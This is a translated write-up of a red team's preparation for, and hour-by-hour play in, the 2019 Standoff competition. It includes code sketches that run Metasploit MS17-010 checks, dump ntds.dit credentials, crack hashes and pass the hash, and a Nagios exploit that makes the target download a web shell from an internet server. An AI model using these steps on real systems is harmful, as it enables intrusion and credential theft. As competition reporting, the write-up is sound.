This is an English-language summary of two outstanding articles written by Vitaliy Malkin from «Informzashita», whose team, True0xA3, won the prestigious attack-versus-defense competition The Standoff at Positive Hack Days 9 in May 2019.
Vitaliy has published three detailed articles on Habr, two of which describe the strategies the True0xA3 team used before and during the competition to secure the title. I felt the only thing those two articles lacked was an English summary, so that a wider audience could enjoy them. Below is a summary of the two articles, together with the images Vitaliy published to clarify his points. Vitaliy has OKed my translating and publishing them.
Part I. Getting ready for the battle
Original article is here
I. Initial objectives
The team consisted of 16 tried-and-true pentesters and 4 interns, armed with 6 servers, our own CUDA station, and the willingness to go the distance.
Active preparations started 8 days prior to the beginning of The Standoff. This was our 3rd attempt to win The Standoff, so some of us were experienced enough to know what needed to be done. From the start, we agreed on the following priorities for the team:
- Smooth coordination among team members
- Collecting low-hanging fruit
- Exploiting vulnerability classes that are atypical for us: Automated Process Control Systems (APCS), Distributed Control Systems (DCS), IoT, GSM
- Getting our own infrastructure and equipment set up ahead of time
- Developing a strategy for persistence and hardening
Coordination
This is the weakness of all newbies at the Standoff: tasks are not distributed effectively, several people work on the same task, it is unclear which tasks have already been completed, and the results of a task do not reach the right team members. The larger the team, the harder coordination becomes. Most importantly, there has to be at least one person who sees the whole picture from the infrastructure standpoint and who can combine multiple vulnerabilities into one focused attack vector.
This year we used the collaboration platform Discord. It is similar to IRC but with extra features such as file uploads and voice calls. For each target on the Standoff map, we created a separate channel in which all the data for that target was gathered. A new team member assigned to a task could thus easily see every piece of info already collected, the results of deployments, and so on. All info channels were limited to 1 message per minute to prevent flooding.
Each member of the team was given a clearly defined scope of work. To improve coordination, one person was assigned to make the final decision on all tasks, which kept us out of long discussions and disagreements during the competition.
Collecting low-hanging fruit
I believe the most important factor in the game turned out to be the ability to manage multiple projects and properly prioritize objectives. In last year's game, we were able to take over an office and hold it simply by using well-known vulnerabilities. This year we decided to make a list of such vulnerabilities ahead of time and organize our knowledge:
ms17-010; ms08-067; SMBCry; LibSSH RCE; HP Data Protector; HP iLO; IPMI; Cisco Smart Install; Java RMI; JDWP; JBoss; drupalgeddon2; WebLogic; Heartbleed; Shellshock; IBM WebSphere; IIS WebDAV; rservices; VNC; ftp-anon; NFS; smb-null; Tomcat
Then we created two services, checker and penetrator, which automated testing for these vulnerabilities and deploying the publicly available exploits and Metasploit modules. The services consumed nmap results to speed up our work.
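To give a flavor of the idea, here is a minimal sketch of such a checker, assuming nmap XML output and Metasploit's non-interactive mode. The module map and file names are illustrative, not the team's actual tooling:

```python
#!/usr/bin/env python3
"""Sketch of a 'checker'-style service: feed nmap results into
vulnerability checks. Illustrative reconstruction, not the team's code."""
import subprocess
import xml.etree.ElementTree as ET

# A small illustrative subset of the list above: port -> Metasploit module.
CHECKS = {
    445: "auxiliary/scanner/smb/smb_ms17_010",       # MS17-010
    8080: "auxiliary/scanner/http/tomcat_mgr_login", # exposed Tomcat manager
}

def hosts_with_open_port(nmap_xml: str, port: int) -> list:
    """Return hosts from `nmap -oX` output that have the given TCP port open."""
    hosts = []
    for host in ET.parse(nmap_xml).getroot().iter("host"):
        addr = host.find("address").get("addr")
        for p in host.iter("port"):
            if int(p.get("portid")) == port and \
               p.find("state").get("state") == "open":
                hosts.append(addr)
    return hosts

def run_msf_module(module: str, rhosts: str) -> None:
    """Drive msfconsole non-interactively for one module and one host."""
    cmds = f"use {module}; set RHOSTS {rhosts}; run; exit"
    subprocess.run(["msfconsole", "-q", "-x", cmds], timeout=600)

if __name__ == "__main__":
    for port, module in CHECKS.items():
        for host in hosts_with_open_port("scan.xml", port):
            run_msf_module(module, host)
```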
Exploiting vulnerabilities that are atypical for us
We did not have much experience with vulnerability analysis for Automated Process Control Systems (APCS). We started digging into the topic approximately 8 days before the Standoff. The situation with IoT and GSM was even worse: we had never touched these systems outside of prior Standoffs.
Therefore, at the preparation stage, we assigned 2 people to study APCS and 2 more to study GSM and IoT. Within a week, the first pair compiled a list of typical approaches to pentesting SCADA systems and studied in detail the videos of the previous year's Standoff infrastructure. They also downloaded approximately 200 GB of various HMI software, drivers, and other controller-related software. The IoT pair prepared some hardware and read all the articles on GSM they could find. We hoped it would be enough (spoiler alert: it was not!)
Getting our own infrastructure and equipment set up
Since we had a pretty large team, we decided that we would need additional equipment. This is what we took with us:
- CUDA-server
- Backup laptop
- WiFi router
- Switch
- Variety of network cables
- Alfa WiFi adapters
- Rubber duckies
Last year we learned the importance of CUDA servers when cracking a couple of WiFi handshakes. It is important to note that this year, as in previous years, all the red teams were behind NAT, so we could not use reverse connects from the DMZ. However, we assumed that all hosts other than the APCS would have an internet connection, so we decided to spin up 3 listener servers reachable from the Internet. To make pivoting easier, we used our own OpenVPN server with client-to-client enabled. Unfortunately, automated channel creation was not possible, so for 12 of the 28 hours one team member did nothing but manage the channels.
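For reference, the OpenVPN side of this is only a few directives in the server config. A minimal sketch with placeholder values, not the team's actual setup:

```
# /etc/openvpn/server.conf -- minimal sketch, placeholder values
port 1194
proto udp
dev tun
server 10.8.0.0 255.255.255.0   # address pool handed out to clients
client-to-client                # let pivot hosts and operators reach each other
keepalive 10 60                 # probe and restart dead tunnels
persist-key
persist-tun
```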
Developing a strategy for persistence and hardening
Our previous Standoff experience had taught us that it is not enough to take over a server; it is just as important to prevent other teams from gaining a foothold on it. Therefore we spent significant time on a RAT (Remote Administration Tool) with fresh signatures and on scripts to harden Windows systems. We used a standard RAT but slightly changed the obfuscation method. The rules were the harder part to get right. Overall, we developed the following set of scripts (a Windows sketch follows below):
- Closing the SMB (server message block) and RPC (remote procedure call) ports
- Moving RDP (remote desktop protocol) to non-standard ports
- Turning off reversible encryption, guest accounts, and fixing other typical security-baseline issues
For Linux systems, we developed a special init script which closed all ports, moved SSH to a non-standard port, and installed the team's public keys for SSH access.
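To make the Windows list above concrete, here is a condensed Python sketch of what such a hardening script might look like; the ports, rule names, and registry value are standard, but the script as a whole is an illustration, not the team's actual code:

```python
#!/usr/bin/env python3
"""Sketch of post-compromise Windows hardening: block SMB/RPC, move RDP.
Run as local admin from a non-RDP shell; values are illustrative."""
import subprocess

RDP_KEY = (r"HKLM\SYSTEM\CurrentControlSet\Control"
           r"\Terminal Server\WinStations\RDP-Tcp")
NEW_RDP_PORT = "50002"

def run(*cmd):
    print("+", " ".join(cmd))
    subprocess.run(cmd, check=True)

# 1. Block inbound SMB and RPC so nobody re-exploits MS17-010 and friends.
for port in ("445", "139", "135"):
    run("netsh", "advfirewall", "firewall", "add", "rule",
        f"name=block_{port}", "dir=in", "action=block",
        "protocol=TCP", f"localport={port}")

# 2. Move RDP to a non-standard port and let it through the firewall.
run("reg", "add", RDP_KEY, "/v", "PortNumber",
    "/t", "REG_DWORD", "/d", NEW_RDP_PORT, "/f")
run("netsh", "advfirewall", "firewall", "add", "rule",
    "name=rdp_alt", "dir=in", "action=allow",
    "protocol=TCP", f"localport={NEW_RDP_PORT}")
run("net", "stop", "TermService", "/y")   # drops existing RDP sessions!
run("net", "start", "TermService")

# 3. Reversible encryption ("store passwords using reversible encryption")
#    is an AD/GPO setting, so it is fixed on the domain, not per host.
```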
II. Briefing
On May 17th, 5 days before the Standoff, the organizers held a briefing for the red teams and provided a lot of info that affected our preparation. They published a map of the network, which allowed us to divide it into zones and assign responsibility for each zone to a team member. The most important disclosure was that the APCS would be accessible only from one network segment, and that segment was not protected. Moreover, they disclosed that the highest points would be awarded for the APCS and for the secured offices. They also said that they would reward red teams for knocking each other out of the network.
We read this as: «Whoever captures bigbrogroup will likely win the game.» Our prior experience taught us that no matter how the organizers penalize loss of service, the blue teams will kill vulnerable servers they cannot patch fast enough: their companies worry far more about the publicity of a totally hacked system than about some lost points in a game. As we will soon see, our guess was correct.
Therefore, we decided to divide the team into 4 parts:
I. Bigbrogroup. We prioritized this task above all others and staffed it with our most experienced pentesters. This mini-team was 5 people strong; its main objectives were to take over the domain and to prevent other teams from gaining access to the APCS.
II. Wireless networks. This team was responsible for watching WiFi, tracking new access points, and capturing and bruteforcing handshakes. They were also responsible for GSM, but their main goal was to prevent other teams from taking over the WiFi.
III. Unprotected networks. This team spent the first 4 hours testing all unprotected networks and analyzing vulnerabilities. We understood that in the first 4 hours nothing interesting could happen in the protected segments, at least nothing the blue teams could not knock out, so we decided to spend those first few hours casing the unprotected networks, where no defenders would interfere. As it turned out, this was a good approach.
IV. Scanners group. The organizers told us in advance that the network topology would be changing constantly, so we devoted 2 people to scanning the network and detecting changes. Automating this turned out to be difficult since we had multiple networks with different settings. For example, in the first hour our nmap ran fine in T3 mode, but by noon it barely worked even in T1 mode.
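A minimal sketch of such a re-scan-and-diff loop, assuming nmap XML output; the range and interval are placeholders (nmap also ships the ndiff utility, which solves the same problem):

```python
#!/usr/bin/env python3
"""Sketch: periodically re-scan a range and report what changed."""
import subprocess
import time
import xml.etree.ElementTree as ET

TARGETS = "192.168.0.0/24"   # placeholder range
INTERVAL = 900               # seconds between scans

def scan():
    """Run nmap and return the set of (host, open port) pairs."""
    subprocess.run(["nmap", "-T2", "-oX", "scan.xml", TARGETS], check=True)
    pairs = set()
    for host in ET.parse("scan.xml").getroot().iter("host"):
        addr = host.find("address").get("addr")
        for p in host.iter("port"):
            if p.find("state").get("state") == "open":
                pairs.add((addr, int(p.get("portid"))))
    return pairs

previous = scan()
while True:
    time.sleep(INTERVAL)
    current = scan()
    for host, port in sorted(current - previous):
        print(f"[+] new open port: {host}:{port}")
    for host, port in sorted(previous - current):
        print(f"[-] port gone:     {host}:{port}")
    previous = current
```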
Another important vector was the list of software and technologies the organizers provided during the briefing. For each technology we created a competency group that could quickly assess its typical vulnerabilities. For some services we found known vulnerabilities but no published exploits. This was the case, for example, with the Redis post-exploitation RCE. We were pretty sure this vulnerability would be present in the Standoff infrastructure, so we decided to write our own 1-day exploits. Of course, we could not cover everything, but overall we gathered 5 unpublished exploits that we were ready to deploy.
We could not investigate all the technologies, but that turned out not to be critical: covering the highest-priority ones proved sufficient. We also prepared a list of the APCS controllers, which we investigated in detail.
During the preparation phase, we also put together several tools for surreptitious connection to the APCS network. For example, we built a cheap Pineapple clone out of a Raspberry Pi: it would connect to the Ethernet of the production network and reach back to a control service over GSM, letting us configure the Ethernet connection remotely and then broadcast it via the built-in WiFi module. Unfortunately, during the game the organizers made it clear that physical connections to the APCS were prohibited, so we never got to use the device.
We also found quite a bit of info about the workings of the bank, the offshore accounts, and the antifraud system. However, it turned out the bank did not hold that much money, so we decided not to spend time preparing for that target and to play it by ear during the game.
In summary, we did quite a bit of work during the preparation phase. Besides the obvious benefit of winning the Standoff, we reaped less noticeable but no less important benefits, such as:
- We took a break from the day-to-day minutiae of work and tried something we had long hoped to do
- This was our first experience of the entire pentesting team working on a single task, so the team-building effect was very noticeable
- A lot of the information gathered while preparing for the game can be reused in our real-life pentesting projects; we raised our level of competency and built new, ready-to-use tools
Looking back, I realize that our victory in the Standoff was probably secured long before the game began, during the preparation stage. What actually took place during the Standoff is described in Part II below.
Part II. Winning the Standoff. Sharing the lifehacks
The original article is here
From Vitaliy Malkin, head of the red team at Informzashita and captain of the True0xA3 team, which won one of the most prestigious white-hat competitions in Russia: the Standoff at PHDays 2019.
Day One
9:45 MSK
The day started with the results of the masscan. We listed all hosts with port 445 open, and at exactly 10 am we launched the checker with the Metasploit module for MS17-010. According to our plan, the main objective was to capture the domain controller of the bigbrogroup domain, so 2 people from our team were devoted just to that. Below you will see the initial assignments for each group.
As you can see, we attempted to penetrate every office in the game, and having 20 people made a big difference.
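The first step, pulling SMB candidates out of the scan, is trivial; a sketch assuming masscan's list output (masscan ... -p445 -oL masscan.txt), with placeholder file names:

```python
#!/usr/bin/env python3
"""Sketch: extract hosts with 445/tcp open from masscan -oL output."""

def smb_hosts(path="masscan.txt"):
    # List-format lines look like: "open tcp 445 10.0.0.5 1558000000"
    hosts = []
    with open(path) as f:
        for line in f:
            parts = line.split()
            if len(parts) >= 4 and parts[0] == "open" and parts[2] == "445":
                hosts.append(parts[3])
    return hosts

if __name__ == "__main__":
    for host in smb_hosts():
        print(host)   # feed these to the MS17-010 checker
```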
10:15
One of the members of Team 1 finds a host in the bigbrogroup.phd domain vulnerable to MS17-010. We deploy the exploit in a great hurry. A couple of years ago we were in a situation where we got a Meterpreter shell (the Metasploit post-exploitation payload) on an important target only to be kicked out of it within 10 seconds. This year we were better prepared. We take over the host, close the SMB port, and move RDP to port 50002. We pay great attention to persistence on the domain, so we create a few local admin accounts and deploy our own Remote Administration Tool (RAT). Only after that do we move on to the next task.
10:25
We continue to go through the info gathered from the host. Besides access to the internal network and connectivity to the domain controller, we also find a domain admin token. Before getting too excited, we check whether the token is still valid. And then we rejoice: the first domain has fallen. Total time spent: 27 minutes 52 seconds.
Half an hour in, we visit the player portal to understand the rules for turning in flags and receiving points. We see the standard list: domain admin logins, local admins, Exchange admins, and a few other admins. From the domain controller we download ntds.dit while getting our CUDA station ready. Then we discover that reversible encryption is enabled in the domain, which means we can recover every password we need. To figure out which passwords we need, a pair of teammates starts analyzing the AD structure and its groups; 5 minutes later they deliver the results. We turn in our flags and wait. It was about time to get First Blood, at least to boost the team's morale. But nothing. It took us an hour to understand that the checker works like this:
- It is automated
- It has a very inflexible format
- If you submit your flags and do not receive a response within a few seconds, your format does not match the checker's
Finally, we figure out the right format and around 11 am we get our First Blood. Whew!
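For reference, the ntds.dit step mentioned above is essentially a one-liner with impacket's secretsdump: run offline against the file plus the SYSTEM hive, it prints the NT hashes, and for accounts with reversible encryption enabled it prints cleartext passwords outright. A sketch with placeholder paths:

```python
# Sketch: offline credential dump from a copied ntds.dit (placeholder paths).
import subprocess

subprocess.run([
    "secretsdump.py",
    "-ntds", "ntds.dit",   # copied from the domain controller
    "-system", "SYSTEM",   # SYSTEM registry hive, needed for decryption
    "LOCAL",               # offline mode: parse the files locally
], check=True)
```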
11:15
Team 1 splits into two subteams. Subteam 1 continues to fortify the domain: they grab krbtgt, harden the baseline, and change the passwords to the directory services. During the briefing, the organizers told us that whoever gets to a domain first may play with it as they wish. So we change the admin passwords: even if someone comes in and manages to kick us out, they won't have the logins to turn in for points.
Team 2 continues to investigate the domain structure and finds another flag: on the CFO's desktop, a financial report. Unfortunately, it is zipped and password-protected. So we fire up the CUDA station, turn the zip into a hash, and feed it to hashcat.
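That zip-to-hash step might look roughly like this, assuming John the Ripper's zip2john utility and a straight wordlist attack; note that the hashcat mode depends on the archive flavor (13600 for WinZip-style, 17200+ for classic PKZIP), and zip2john's filename prefix may need stripping before hashcat accepts the hash:

```python
# Sketch: convert a protected zip to a hash and crack it on the CUDA station.
# File names, mode, and wordlist are placeholders.
import subprocess

with open("report.hash", "w") as out:
    subprocess.run(["zip2john", "report.zip"], stdout=out, check=True)

subprocess.run([
    "hashcat", "-m", "13600",   # WinZip flavor; use 17200+ for PKZIP archives
    "-a", "0",                  # straight wordlist attack
    "report.hash", "rockyou.txt",
], check=True)
```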
Team 2 also keeps finding interesting services with RCE (remote code execution) potential and starts to look into them. One of them is a monitoring service for the cf-media domain built on Nagios. Another is a schedule manager for a shipping company built around some odd technology we had never seen before. There are also a few curious services such as DOC-to-PDF converters.
The second subteam of Team 1 has by that time started working on the bank and found an interesting MongoDB database containing, among many other things, the names and balances of our team and the others. We change our team's balance to 50 million and move on.
14:00
Our luck has run out. First, the two services we had RCE on in the protected segments became unavailable: the blue teams simply turned them off. Of course, we complain to the organizers about the rule violation, but to no effect. Apparently, in the Standoff there are no business processes to protect! Second, we cannot find the list of clients. We suspect it is hidden somewhere in the depths of 1C, but we have no databases and no configuration files. Dead end.
We try to set up a VPN channel between our remote servers and the APCS segment. For some strange reason, we do it, of all places, on the bigbrogroup domain controller, and the connection between the interfaces breaks. Now the domain controller is unreachable. The part of the team responsible for domain access nearly suffers a heart attack. Tension grows; the fingerpointing begins.
Then we realize that the domain controller is reachable, but the VPN connection is unstable. We carefully retrace our steps, turn off the VPN via RDP, and voila, the domain controller is accessible again. The team collectively exhales. In the end, we set up the VPN from another server. From then on, the domain controller is babied and pampered. All competing teams still have 0 points, which is reassuring.
16:50
The organizers finally publish a miner. Using psexec, we install it on all the endpoints we control. This brings in a small but steady income.
Team 2 is still working on the Nagios vulnerability. The installed version (<= 5.5.6) is vulnerable to CVE-2018-15708 and CVE-2018-15710. A public exploit is available, but it needs a reverse connect to download the web shell. Since we are behind NAT, we have to rewrite the exploit and split it into two parts: the first forces Nagios to connect to our remote server over the Internet, and the second, sitting on that server, serves Nagios the web shell. This gives us proxied access to the cf-media domain. But the connection is unstable and difficult to use, so we decide to sell the exploit for BugBounty points while trying to escalate our access to root.
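A heavily simplified sketch of that two-part split; the trigger URL and parameter are hypothetical stand-ins for the actual CVE-2018-15708 request, which I will not reproduce here:

```python
# Sketch of the NAT workaround: part 2 runs on our internet-facing server and
# serves the web shell; part 1 points the vulnerable Nagios endpoint at it.
import http.server
import socketserver
import sys

import requests  # third-party: pip install requests

LISTEN_PORT = 8000
VULN_URL = "http://nagios.cf-media.local/vuln.php"      # hypothetical endpoint
PAYLOAD_URL = "http://our-vps.example:8000/shell.php"   # our internet server

def serve_shell():
    """Part 2: serve shell.php from the current directory."""
    with socketserver.TCPServer(("", LISTEN_PORT),
                                http.server.SimpleHTTPRequestHandler) as srv:
        srv.serve_forever()

def trigger():
    """Part 1: make Nagios fetch the shell from us over the Internet."""
    requests.get(VULN_URL, params={"url": PAYLOAD_URL}, timeout=30)

if __name__ == "__main__":
    serve_shell() if sys.argv[1:] == ["serve"] else trigger()
```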
18:07
Here come the promised «surprises» from the organizers. They announce that BigBroGroup has just purchased CF-media. We are not terribly surprised: while investigating the bigbrogroup domain, we had noticed trust relationships between the bigbrogroup and cf-media domains.
When the takeover of CF-media was announced, we still had no connection to their network. Right after the announcement, access appeared, saving us from spinning our wheels trying to pivot through Nagios. The bigbrogroup credentials work on the cf-media domain, but the users have no privileges there. No easily exploitable vulnerabilities are found yet, but we are optimistic that something will turn up.
18:30
Suddenly we are kicked out of the bigbrogroup domain. By whom? How? It looks like team TSARKA is the culprit! They change the admin password, but we have 4 other admin accounts in reserve. We change the domain admin password again and reset all the passwords. Minutes later we are kicked out again! At that exact moment, we find a vector into the cf-media domain: on one of their servers, the username and password hash match ones we had previously found in the bigbrogroup domain. Oh, password reuse! What would we do without you? Now we just need to crack the hash. Hashkiller gives us P@ssw0rd. Moving on.
19:00
The struggle for control over bigbrogroup is becoming a serious problem. TSARKA has changed the krbtgt password twice; we lose all the admin accounts… What's next? A dead end?
19:30
We finally get domain admin privileges on cf-media and start turning in our flags. Even though this is supposed to be a protected domain, we again see reversible encryption. So now we have the logins and passwords, and we go through the same steps as with bigbrogroup: create additional admins, strengthen our foothold, harden the baseline, change passwords, set up a VPN connection. We find a second financial report, also in a password-protected zip, and check with the teammates responsible for the first report. They had managed to brute it, but the organizers would not accept it. Turns out, the flag had to be turned in as the protected 7zip itself, so we did not even need to brute it! 3 hours of work for nothing.
We turn in both reports as protected 7zip files. Our balance is now about 1 million points versus TSARKA's 125,000, but they are starting to turn in their flags from the bigbrogroup domain. We realize we have to stop them, but how?
19:30
We find a solution! We still have the local admin credentials. We log in, grab the ticket, and simply shut down the domain controller. The controller powers off. We close all server ports except RDP and change the passwords of all our local admins. Now we are in our little space and they are in theirs. If only the VPN connection stays stable! The team collectively exhales.
In the meantime, we set up miners on all endpoints in cf-media domain. TSARKA is ahead of us in the overall volume, but we are not far behind, and we have more horsepower.
NIGHT
Here you can see the changes we made in the team during the night.
Some of the team members have to leave for the night. By midnight we are down to 9 people, and productivity falls to near zero. Every hour we get up to splash water on our faces and step outside for air, just to shake off the sleepiness.
Now, at last, we are getting to the Automated Process Control Systems (APCS).
02.00
The last few hours have been very discouraging. We have found several vectors, but they are already closed. We cannot tell whether they were closed from the start or whether TSARKA has already been here. Slowly working through the APCS, we find a vulnerable NetBus controller and use a Metasploit module whose inner workings we do not entirely understand. Suddenly, the lights in the city go off. The organizers announce that they will count it for us if we can turn the lights back on. At that moment, our VPN goes down: the server managing the VPN has been taken over by TSARKA! It seems we were discussing the APCS too loudly.
03.30
Even the most dedicated of us are starting to nod off. Only 7 are still working. Suddenly, without any explanation, the VPN comes back up. We quickly repeat the trick with the city lights and watch our balance go up by 200,000 points!!!
Part of the team keeps looking for additional vectors while the rest work on the APCS, where we find two more vulnerabilities. One of them we are able to exploit, but the exploit could end up rewriting the microcontroller's firmware. We discuss this with the organizers and decide to wait for the rest of the team to rejoin us in the morning and then decide collectively what to do.
05:30
Our VPN now works about 10 minutes every hour before disconnecting again. We try to work within those windows, but productivity is near zero. Eventually, we decide to take turns napping for an hour each. Spoiler alert: bad idea!
5 people are still working on the APCS.
MORNING
In the morning we suddenly realize that we are ahead of the other teams by almost 1 million points. TSARKA has managed to turn in two flags from the APCS, plus several flags from the telecom provider and bigbrogroup. They also have miners working, and they must be sitting on crypto they have not turned in yet; we estimate at least another 200-300 thousand points' worth. This is unnerving. We suspect they may be holding back a few more flags until the final hours. But our team is coming back online. The morning sound check in the main arena is a little annoying but does chase the sleep away.
We keep trying to break into the APCS, but hope is dimming. The gap in points between the top two teams and the rest is gigantic. We worry the organizers might throw in a few more «surprises» to shake things up.
After a joint press conference with TSARKA in the main arena, we decide to change our strategy from «get more flags» to «prevent TSARKA from turning in more flags».
On one of our servers we fire up Cain&Abel and redirect all traffic to ourselves. We find some VPN connections from Kazakhstan and kill them. Then we decide to kill all traffic outright, so we add local firewall rules on the VPN channel to drop everything inside the APCS network. This is how you protect an APCS! The organizers soon complain that they have lost their own connection to the APCS, so we open access for their IP addresses (this is NOT how you protect an APCS).
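On a Linux VPN box, that blocking setup might look roughly like this; the subnet and organizer addresses are placeholders:

```python
# Sketch: drop all forwarded APCS traffic, then whitelist the organizers.
import subprocess

APCS_NET = "172.20.0.0/16"                  # placeholder APCS subnet
ORG_IPS = ["10.10.10.10", "10.10.10.11"]    # placeholder organizer addresses

def ipt(*args):
    subprocess.run(["iptables", *args], check=True)

for ip in ORG_IPS:
    ipt("-I", "FORWARD", "1", "-s", ip, "-j", "ACCEPT")  # allow rules first
ipt("-A", "FORWARD", "-d", APCS_NET, "-j", "DROP")
ipt("-A", "FORWARD", "-s", APCS_NET, "-j", "DROP")
```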
12:47
We were right to worry about the organizers shaking things up. Out of nowhere, they dump data containing 4 logins for each domain. We mobilize the entire team.
Objectives:
Team 1: immediately take over all protected segments.
Team 2: use Outlook Web Access to change the passwords of all the leaked logins.
Some blue teams, sensing a surge of activity, simply turn off their VPN. Others are trickier and change the system language to Chinese. Technically the service is still up! In practice, of course, it is unusable (organizers, pay attention!). Via VPN we manage to connect to 3 of the networks. In one of them we last only 1 minute before being kicked out.
12:52
We locate a behealthy server vulnerable to MS17-010 (in a supposedly protected segment?). We exploit it quickly, encountering no resistance, obtain the domain admin's hash, and access the domain controller via pass-the-hash. And guess what we find there? Reversible encryption!
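The pass-the-hash step can be done with, for example, impacket's psexec.py; a sketch with placeholder values:

```python
# Sketch: authenticate to the DC with the NT hash alone (pass-the-hash).
# Hash, domain, user, and address are all placeholders.
import subprocess

hashes = "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
subprocess.run([
    "psexec.py",
    "-hashes", hashes,                        # format is LMHASH:NTHASH
    "behealthy.phd/Administrator@10.0.0.1",   # hypothetical DC
], check=True)
```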
Whoever was protecting that segment had not done their homework. We collect all the flags except the part related to 1C. We could probably get it with another 30-40 minutes of work, but instead we simply shut down the behealthy domain controller. Who needs competition?
13:20
We turn in our flags. We now have 2,900,000 points plus a few outstanding bug bounties. TSARKA has a little over 1 million; they turn in their cryptocurrency and get another 200,000. We are now pretty sure they cannot catch up; it would be nearly impossible.
13:55
People come up and congratulate us. We are still bracing for some surprise from the organizers, but it looks like we really are being announced as the winners!
This is the chronicle of True0xA3's 28 hours. Of course, I left a lot out: the press conferences in the arena, the torture that was the WiFi and the GSM, the interactions with reporters… but I hope I captured the most interesting moments.
This was one of the most elevating experiences for our team, and I hope I managed to convey at least a little of what the atmosphere of the Standoff feels like, and to entice you to participate, too!
Next, I will publish the final part of this series, where I will analyze our mistakes and ways to remediate them in the future. Because learning from someone else's mistakes is the best kind of learning, right?